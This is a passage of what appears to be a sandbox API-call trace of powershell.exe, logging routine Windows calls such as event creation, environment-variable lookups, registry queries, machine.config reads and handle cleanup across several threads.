	[0751.090] CoTaskMemFree (pv=0x13a0a0) 
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e0
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e4
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x33c
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350
	[0751.092] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x354
	[0751.093] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0751.093] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x35c
	[0751.095] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0751.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.095] CoTaskMemFree (pv=0x13a0a0) 
	[0752.374] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0752.375] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26d8c0 | out: lpMode=0x26d8c0) returned 1
	[0752.376] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0752.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0752.377] CoTaskMemFree (pv=0x13a0a0) 
	[0752.381] SetEvent (hEvent=0x334) returned 1
	[0752.381] SetEvent (hEvent=0x2e0) returned 1
	[0752.381] SetEvent (hEvent=0x328) returned 1
	[0752.381] SetEvent (hEvent=0x2e4) returned 1
	[0752.381] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x360
	[0752.384] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0752.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0752.384] CoTaskMemFree (pv=0x13a0a0) 
	[0752.385] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d618 | out: phkResult=0x26d618*=0x364) returned 0x0
	[0752.385] RegQueryValueExW (in: hKey=0x364, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d59c, lpData=0x0, lpcbData=0x26d598*=0x0 | out: lpType=0x26d59c*=0x0, lpData=0x0, lpcbData=0x26d598*=0x0) returned 0x2

Thread:
	id = 441
	os_tid = 0x10d0


Thread:
	id = 445
	os_tid = 0x10e0


Thread:
	id = 1014
	os_tid = 0x1af8


Thread:
	id = 1020
	os_tid = 0x1b18


Thread:
	id = 1023
	os_tid = 0x1b2c


Thread:
	id = 1057
	os_tid = 0x1380


Thread:
	id = 1061
	os_tid = 0x1440

	[0551.915] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0643.718] LocalFree (hMem=0xb7310) returned 0x0
	[0643.719] CloseHandle (hObject=0x328) returned 1
	[0643.719] CloseHandle (hObject=0x13) returned 1
	[0643.719] CloseHandle (hObject=0xf) returned 1
	[0643.720] RegCloseKey (hKey=0x310) returned 0x0
	[0643.720] RegCloseKey (hKey=0x30c) returned 0x0
	[0643.720] RegCloseKey (hKey=0x308) returned 0x0
	[0643.721] LocalFree (hMem=0xb7340) returned 0x0
	[0651.441] RegCloseKey (hKey=0x308) returned 0x0
	[0670.226] RegCloseKey (hKey=0x308) returned 0x0
	[0699.853] RegCloseKey (hKey=0x310) returned 0x0
	[0699.853] RegCloseKey (hKey=0x308) returned 0x0
	[0735.568] RegCloseKey (hKey=0x398) returned 0x0
	[0735.568] RegCloseKey (hKey=0x394) returned 0x0
	[0735.568] RegCloseKey (hKey=0x370) returned 0x0
	[0735.568] RegCloseKey (hKey=0x3ac) returned 0x0
	[0735.569] RegCloseKey (hKey=0x38c) returned 0x0
	[0735.569] RegCloseKey (hKey=0x388) returned 0x0
	[0735.569] RegCloseKey (hKey=0x384) returned 0x0
	[0735.570] RegCloseKey (hKey=0x380) returned 0x0
	[0735.570] RegCloseKey (hKey=0x37c) returned 0x0
	[0735.570] RegCloseKey (hKey=0x378) returned 0x0
	[0735.570] RegCloseKey (hKey=0x374) returned 0x0
	[0735.571] RegCloseKey (hKey=0x34c) returned 0x0
	[0735.571] RegCloseKey (hKey=0x3a8) returned 0x0
	[0735.571] RegCloseKey (hKey=0x3a4) returned 0x0
	[0735.571] RegCloseKey (hKey=0x36c) returned 0x0
	[0735.572] RegCloseKey (hKey=0x368) returned 0x0
	[0735.572] RegCloseKey (hKey=0x364) returned 0x0
	[0735.572] RegCloseKey (hKey=0x360) returned 0x0
	[0735.572] RegCloseKey (hKey=0x35c) returned 0x0
	[0735.573] RegCloseKey (hKey=0x358) returned 0x0
	[0735.573] RegCloseKey (hKey=0x354) returned 0x0
	[0735.573] RegCloseKey (hKey=0x350) returned 0x0
	[0735.573] RegCloseKey (hKey=0x3a0) returned 0x0
	[0735.574] RegCloseKey (hKey=0x340) returned 0x0
	[0735.574] RegCloseKey (hKey=0x33c) returned 0x0
	[0735.574] RegCloseKey (hKey=0x338) returned 0x0
	[0735.574] RegCloseKey (hKey=0x334) returned 0x0
	[0735.575] RegCloseKey (hKey=0x2e4) returned 0x0
	[0735.575] RegCloseKey (hKey=0x2e0) returned 0x0
	[0735.575] RegCloseKey (hKey=0x328) returned 0x0
	[0735.575] RegCloseKey (hKey=0x310) returned 0x0
	[0735.576] RegCloseKey (hKey=0x39c) returned 0x0
	[0768.664] RegCloseKey (hKey=0x364) returned 0x0
	[0888.484] CertFreeCRLContext (pCrlContext=0x1b8b6890) returned 1
	[0888.485] CertFreeCRLContext (pCrlContext=0x1cead340) returned 1
	[0888.485] CloseHandle (hObject=0x4c8) returned 1
	[0888.486] CertCloseStore (hCertStore=0x110e80, dwFlags=0x0) returned 1
	[0888.486] CertFreeCRLContext (pCrlContext=0x1b8b6890) returned 1
	[0888.486] CloseHandle (hObject=0x4b8) returned 1
	[0888.487] CloseHandle (hObject=0x4b4) returned 1
	[0888.487] CertFreeCRLContext (pCrlContext=0x1b8b6910) returned 1
	[0888.487] CloseHandle (hObject=0x464) returned 1
	[0888.487] CloseHandle (hObject=0x40c) returned 1
	[0888.488] CloseHandle (hObject=0x408) returned 1
	[0888.488] CloseHandle (hObject=0x460) returned 1
	[0888.488] CloseHandle (hObject=0x3b8) returned 1
	[0888.488] CloseHandle (hObject=0x3b4) returned 1
	[0888.489] CloseHandle (hObject=0x390) returned 1
	[0888.489] CloseHandle (hObject=0x398) returned 1
	[0888.489] CloseHandle (hObject=0x394) returned 1
	[0888.490] CloseHandle (hObject=0x38c) returned 1
	[0888.490] CloseHandle (hObject=0x388) returned 1
	[0888.490] CloseHandle (hObject=0x384) returned 1
	[0888.491] CertFreeCRLContext (pCrlContext=0x1cead2c0) returned 1
	[0888.491] CloseHandle (hObject=0x380) returned 1
	[0888.491] CloseHandle (hObject=0x37c) returned 1
	[0888.491] CloseHandle (hObject=0x374) returned 1
	[0888.492] CloseHandle (hObject=0x378) returned 1
	[0888.492] CloseHandle (hObject=0x364) returned 1

Thread:
	id = 1129
	os_tid = 0x394


Thread:
	id = 1538
	os_tid = 0x2040

	[0753.603] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0753.608] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0753.613] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0753.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.613] CoTaskMemFree (pv=0x13a0a0) 
	[0753.615] VirtualQuery (in: lpAddress=0x1c86d740, lpBuffer=0x1c86e600, dwLength=0x30 | out: lpBuffer=0x1c86e600*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0753.621] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0753.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.621] CoTaskMemFree (pv=0x13a0a0) 
	[0753.624] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0753.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.624] CoTaskMemFree (pv=0x13a0a0) 
	[0753.627] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0753.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.627] CoTaskMemFree (pv=0x13a0a0) 
	[0754.741] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.742] CoTaskMemFree (pv=0x13a0a0) 
	[0754.745] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.745] CoTaskMemFree (pv=0x13a0a0) 
	[0754.749] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.749] CoTaskMemFree (pv=0x13a0a0) 
	[0754.759] VirtualQuery (in: lpAddress=0x1c86d9f0, lpBuffer=0x1c86e8b0, dwLength=0x30 | out: lpBuffer=0x1c86e8b0*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0754.760] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.760] CoTaskMemFree (pv=0x13a0a0) 
	[0754.766] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.766] CoTaskMemFree (pv=0x13a0a0) 
	[0754.766] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.766] CoTaskMemFree (pv=0x13a0a0) 
	[0754.768] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.768] CoTaskMemFree (pv=0x13a0a0) 
	[0754.772] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0754.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.773] CoTaskMemFree (pv=0x13a0a0) 
	[0757.680] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0757.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.680] CoTaskMemFree (pv=0x13a0a0) 
	[0757.682] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0757.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.682] CoTaskMemFree (pv=0x13a0a0) 
	[0757.683] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0757.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.684] CoTaskMemFree (pv=0x13a0a0) 
	[0757.686] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0757.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.686] CoTaskMemFree (pv=0x13a0a0) 
	[0757.688] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0757.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.688] CoTaskMemFree (pv=0x13a0a0) 
	[0757.689] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0757.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.690] CoTaskMemFree (pv=0x13a0a0) 
	[0757.691] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0757.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.691] CoTaskMemFree (pv=0x13a0a0) 
	[0758.914] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0758.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0758.915] CoTaskMemFree (pv=0x13a0a0) 
	[0760.455] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0760.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.455] CoTaskMemFree (pv=0x13a0a0) 
	[0762.782] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0762.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.782] CoTaskMemFree (pv=0x13a0a0) 
	[0762.786] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0762.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.786] CoTaskMemFree (pv=0x13a0a0) 
	[0762.789] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0762.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.789] CoTaskMemFree (pv=0x13a0a0) 
	[0807.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0807.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0809.639] CoTaskMemAlloc (cb=0x20c) returned 0x1b866180
	[0809.640] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b866180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0809.640] CoTaskMemFree (pv=0x1b866180) 
	[0809.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c86d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0809.651] GetCurrentProcess () returned 0xffffffffffffffff
	[0809.652] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d388 | out: TokenHandle=0x1c86d388*=0x364) returned 1
	[0809.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c86cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0809.658] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d430 | out: lpFileInformation=0x1c86d430*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0809.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c86cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0809.660] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d3e0 | out: lpFileInformation=0x1c86d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0809.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c86cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0809.661] SetErrorMode (uMode=0x1) returned 0x1
	[0809.662] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x378
	[0809.662] GetFileType (hFile=0x378) returned 0x1
	[0809.662] SetErrorMode (uMode=0x1) returned 0x1
	[0809.662] GetFileType (hFile=0x378) returned 0x1
	[0809.664] GetFileSize (in: hFile=0x378, lpFileSizeHigh=0x1c86d3d8 | out: lpFileSizeHigh=0x1c86d3d8*=0x0) returned 0x622a
	[0809.664] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d2f8, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86d2f8*=0x1000, lpOverlapped=0x0) returned 1
	[0810.607] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86ce28, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86ce28*=0x1000, lpOverlapped=0x0) returned 1
	[0811.672] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86ce28, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86ce28*=0x1000, lpOverlapped=0x0) returned 1
	[0813.550] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86ce28, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86ce28*=0x1000, lpOverlapped=0x0) returned 1
	[0813.550] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86ce28, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86ce28*=0x1000, lpOverlapped=0x0) returned 1
	[0813.560] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86cf68, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86cf68*=0x1000, lpOverlapped=0x0) returned 1
	[0813.560] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86cde8, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86cde8*=0x22a, lpOverlapped=0x0) returned 1
	[0813.561] ReadFile (in: hFile=0x378, lpBuffer=0x2fbfe00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86ce88, lpOverlapped=0x0 | out: lpBuffer=0x2fbfe00*, lpNumberOfBytesRead=0x1c86ce88*=0x0, lpOverlapped=0x0) returned 1
	[0813.561] CloseHandle (hObject=0x378) returned 1
	[0813.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0813.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0813.563] CoTaskMemAlloc (cb=0x20c) returned 0x1b866180
	[0813.563] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b866180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0813.563] CoTaskMemFree (pv=0x1b866180) 
	[0813.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c86d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0813.564] GetCurrentProcess () returned 0xffffffffffffffff
	[0813.564] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d5e8 | out: TokenHandle=0x1c86d5e8*=0x378) returned 1
	[0813.565] GetCurrentProcess () returned 0xffffffffffffffff
	[0813.565] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d5e8 | out: TokenHandle=0x1c86d5e8*=0x374) returned 1
	[0813.567] GetCurrentProcess () returned 0xffffffffffffffff
	[0813.567] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d388 | out: TokenHandle=0x1c86d388*=0x37c) returned 1
	[0813.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d430 | out: lpFileInformation=0x1c86d430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0813.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0813.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d3e0 | out: lpFileInformation=0x1c86d3e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0813.571] GetCurrentProcess () returned 0xffffffffffffffff
	[0813.571] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d5e8 | out: TokenHandle=0x1c86d5e8*=0x380) returned 1
	[0813.571] GetCurrentProcess () returned 0xffffffffffffffff
	[0813.571] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d5e8 | out: TokenHandle=0x1c86d5e8*=0x384) returned 1
	[0814.939] GetCurrentProcess () returned 0xffffffffffffffff
	[0814.939] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d268 | out: TokenHandle=0x1c86d268*=0x388) returned 1
	[0816.280] GetCurrentProcess () returned 0xffffffffffffffff
	[0816.280] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d268 | out: TokenHandle=0x1c86d268*=0x38c) returned 1
	[0817.899] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac
	[0817.899] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370
	[0817.917] GetCurrentProcess () returned 0xffffffffffffffff
	[0817.918] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d238 | out: TokenHandle=0x1c86d238*=0x394) returned 1
	[0817.925] GetCurrentProcess () returned 0xffffffffffffffff
	[0817.925] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d238 | out: TokenHandle=0x1c86d238*=0x398) returned 1
	[0819.260] GetCurrentProcess () returned 0xffffffffffffffff
	[0819.260] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d178 | out: TokenHandle=0x1c86d178*=0x390) returned 1
	[0819.268] GetCurrentProcess () returned 0xffffffffffffffff
	[0819.268] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d178 | out: TokenHandle=0x1c86d178*=0x3b4) returned 1
	[0819.275] GetCurrentProcess () returned 0xffffffffffffffff
	[0819.275] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d7b8 | out: TokenHandle=0x1c86d7b8*=0x3b8) returned 1
